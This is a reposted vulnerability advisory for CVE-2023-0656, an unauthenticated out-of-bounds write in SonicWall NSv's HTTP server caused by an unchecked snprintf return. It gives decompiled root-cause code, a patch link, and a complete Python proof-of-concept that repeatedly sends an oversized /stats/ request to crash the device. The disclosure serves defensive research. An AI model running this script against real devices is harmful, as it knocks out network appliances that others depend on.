SSD ADVISORY – SONICWALL OUT OF BOUNDS WRITE DOS

IoT 12个月前 admin
309 0 0

Summary

A vulnerability in SonicWall allows remote attackers to crash the target server on affected installations. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the `httpServer` function. The issue results from the lack of checking the return result of `snprintf` before using it to calculate the maximum length. An attacker can leverage this vulnerability to impact the availability of the target server.

Credit

Alex Birnberg of SSD Labs

CVE

CVE-2023-0656

Affected Devices

SonicWall NSv 270 R1833

Vendor Response

The vendor has released patches available at: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0004

Technical Analysis

The root cause of the vulnerability may be found within the httpServer function. In certain cases where the beginning of the path matches [1] the string /stats/, or other strings such as /Security_Services/ the code executes the snprintf logic.

_BOOL8 __fastcall sub_24164E0(const void *a1)
{
return memcmp(a1, “/stats/”, 7uLL) == 0; // 1
}

The httpServer function is responsible for handling incoming requests. When handling requests to paths that begin with /stats/ the following code will be called. The first snprintf prints [2] the method of the request and the path where the request is addressed to. Note that if the path exceeds the size specified in the function call, this size will still be returned by the function, even though the strings are being printed to the buffer accordingly. The next snprintf function call [3] takes the result returned from the previous snprintf call and substracts it from 1024. In the case where the result is bigger than 1024 this will lead to having the snprintf being called with a negative value for its length, and as the second argument is unsigned it would be a very large value instead. This can lead to buffer overflow with arbitrary data, which later leads to the denial of serivce condition by overflowing the stack canary.

void httpServer(SonicWall_HttpContext **context) {
// …
v43 = __snprintf_chk(v151, 1024LL, 1LL, 1024LL, “%s %s”, v42, *(const char **)(v2 + 112)); // 2
if ( !*(_BYTE *)(v2 + 88) )
__snprintf_chk(&v151[v43], 1024LL – v43, 1LL, -1LL, ” HTTP/%s”, *(const char **)(v2 + 136)); // 3
// …
}

PoC

#!/usr/bin/env python3
import ssl
import time
import socket
import argparse
import urllib.parse
class Exploit:
def __init__(self, args):
self.hostname = urllib.parse.urlparse(args.url).hostname
def trigger(self):
print(‘[*] Triggering…’)
while 1:
try:
self.dos()
except:
pass
time.sleep(5)
def dos(self):
payload = “GET /stats/” + “A” * 0x400 + ” HTTP/1.1″ + \
“B” * 0x2000 + “\r\nHost: “ + self.hostname + “\r\n\r\n”
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
context = ssl.SSLContext()
ssl_sock = context.wrap_socket(sock)
ssl_sock.connect((self.hostname, 443))
ssl_sock.send(payload.encode())
ssl_sock.close()
if __name__ == ‘__main__’:
parser = argparse.ArgumentParser()
parser.add_argument(‘–url’, help=‘Target URL’, required=True, metavar=)
exploit = Exploit(parser.parse_args())
exploit.trigger()

 

原文始发于SSD Secure Disclosure Technical Team:SSD ADVISORY – SONICWALL OUT OF BOUNDS WRITE DOS

版权声明:admin 发表于 2023年4月9日 下午9:18。
转载请注明:SSD ADVISORY – SONICWALL OUT OF BOUNDS WRITE DOS | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...